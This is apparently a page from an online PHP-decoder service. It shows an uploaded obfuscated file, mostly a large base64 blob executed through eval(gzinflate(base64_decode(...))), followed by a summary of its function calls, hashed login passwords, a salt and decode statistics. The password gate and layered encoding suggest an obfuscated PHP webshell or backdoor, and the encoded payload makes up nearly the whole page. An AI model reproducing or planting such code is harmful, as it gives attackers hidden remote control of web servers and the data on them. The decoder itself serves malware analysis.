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";
eval(gzinflate(base64_decode($code)));
?>div></body>
</html>

Function Calls

md5	3
trim	1
gzinflate	1
base64_decode	1
session_start	1
set_time_limit	1
error_reporting	1

Variables

$psw
$code	7X1rb+tIltj3APkPvBxP227Levoly9a9sizZ8ku2JEu27214KJISafFlknr5..
$pass	351e9513646af19c7f82b66c2caf60fd
$salt	silic1234
$password	8f841a9b44b0167db6056389e0106af4
$chk_login	1

Stats

MD5	5bcf481ec08a779d15c9862ef327a348
Eval Count	1
Decode Time	126 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats